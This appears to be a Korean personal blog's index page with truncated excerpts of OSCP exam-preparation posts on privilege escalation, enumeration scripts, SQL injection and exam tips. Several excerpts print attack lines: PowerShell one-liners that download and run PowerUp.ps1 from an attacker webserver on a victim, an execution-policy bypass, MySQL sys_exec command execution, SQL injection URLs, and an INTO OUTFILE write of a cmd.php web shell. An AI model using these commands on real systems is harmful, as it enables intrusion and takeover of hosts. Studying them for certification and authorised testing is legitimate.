Elbrown

리눅스 manual 테크닉https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html Kernel exploits-다른 쳅터 참고 Programs running as root>ps aux Mysql root로 실행중이고 디비 접속 가능하다면 쉘 실행가능select sys_exec('whoami');select sys_eval('whoami');+User Defined function Installed software- 설치되는 폴더가 넘 광범위함, 스크립트를 활용하거나 dpkg만....# Debiandpkg -l Weak/reused/plaintext passwords- DB가 저장된 웹소스, 설정파일 찾..

https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842 *주목해야할 권한 주체Authenticated UserNT AUTHORITY\INTERACTIVEBUILTIN\Users(로그인 사용자)Everyone 스크립트마다 누락된 사항이 있을 수 있기 때문에 여러개를 돌려봐야함, 수동으로 찾아보는 것도 추천된다. Sherlock (Deprecated) => Watsons 사용할 것https://github.com/rasta-mouse/Watson 커맨드창에서 파워 쉘 실행 옵션powershell -noprofile -nologo -ep bypass -file WindowsEnum.ps1 * RDP허용? O, 저장된 패스..

1차 시험 불합격 1200불 순삭 1. Course 자료만 열심히 공부한다고 붙을 수 있는 시험이 아니다. -_ㅜ 2. 머신이 랜덤으로 배정되기 때문에 운이 따라줘야한다 3. 구글링과 payload 커스터마이징, 트러블슈팅, 시간관리 충분히 연습해둘 것. 4. 스크립트에만 의존하지 말자. 수작업 명령어가 더 빠르고 정확할 수 있다. 5. 24시간동안 풀도록 시간끌만한 함정들이 존재하니 사소한 부분이라도 놓치지 말자 ^^

Error based SQL Injection 에러 백터 체크 ' http://testphp.vulnweb.com/listproducts.php?cat=1 컬럼 Enumeration order by 명령 12개에서 에러가 발생하므로 컬럼수 는 11개 http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+11-- http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12-- 출력 위치 파악 * 어떤 웹 어플리케이션의 경우, 파라미터 값이 -1 등 범위를 벗어난 값이 입력되야 출력되는 경우도 있다. 2하고 7 그리고 9가 화면에 출력 됨 http://testphp.vulnweb.com/listproduct..

winPEAS 1. bat vs exe bat파일은 exe파일보다 훨씬 많은 Enumeration을 제공함, 단점: 오래걸린다. exe파일은 컬러를 활용해 취약 부분을 표시해주므로 가식성이 좋다, 단점: 미탐이 존재한다. =>결론: 둘다 사용하자. 2. x64 vs x64 x86 실행파일은 x64에서 실행이 되지만 실행 파일에 대한 권한체크 부분이 미흡했다. =>결론: 아키텍쳐에 맞는 실행파일을 실행하자. LinEnum.sh vs LinPEAS.sh linEnum.sh: 빠르지만 linPEAS보다 상대적으로 수준이 낮음 linPEAS.sh: 컬러, 디테일한 체크, 서버 파일이 너무 많을 경우 대기 상태가 길어질 수 있음 Linprivchecker.py: 빠르지만 가식성이 안좋음, 파이썬이 설치되어 있어야..

https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html https://herrfeder.github.io/pentesting/2018/09/30/OSCP-Cheat-Sheet.html https://www.gitbook.com/book/sushant747/total-oscp-guide sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html blog.g..

http://virgil-cj.blogspot.com/2018/02/escalation-time.html These one-liners download the script from your webserver and run it directly on the victim machine. c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks" c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://1..

마지막 2주간 준비 리스트 리눅스, 윈도우 기본 권한상승 기법 보고서 탬플릿 작성해보기 리눅스 버퍼오버플로우, 윈도우 버퍼오버플로우 스크립트 정리 니샹 파워쉘 연습(Fully interactive shell) 혹시 모를 필요한 가상머신 미리 받아놓기 레거시 시스템 대비 파일전송 정리 SQL 인잭션 manual 치트시트 정리 manual vs script Enumeration (TCM 머신에서 winPEAS, linPEAS, linEnum 돌려보기) 파워쉘 난독화, 방화벽 우회 방법 정리(파워쉘 난독화까지는 필요없을거 같아서 링크만 적어둠) PDF Breakdown 정리 레거시 시스템 Enumeration 정리 LAB 정리 칼리에 도구 다운로드 및 정리 웹캠 준비 시험 계획 짜기 강남에서 영문 운전면허증 ..

Manual SQL Injection Cheat sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html https://guide.offsecnewbie.com/5-sql Load File http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' Write File http://example.com/photoalbum.php?id=1 uni..

Get yourself comfortable with windows, I know most of us know exactly how to enumerate a Linux system but do you know windows? Check all the ways you can get a higher privilege other than just spamming kernel exploits (I didn't use a single kernel exploit in MY exam) Enumeration is the key if you have 2 vulnerabilities maybe you need to chain them???? Think out of the box. If you're trying the s..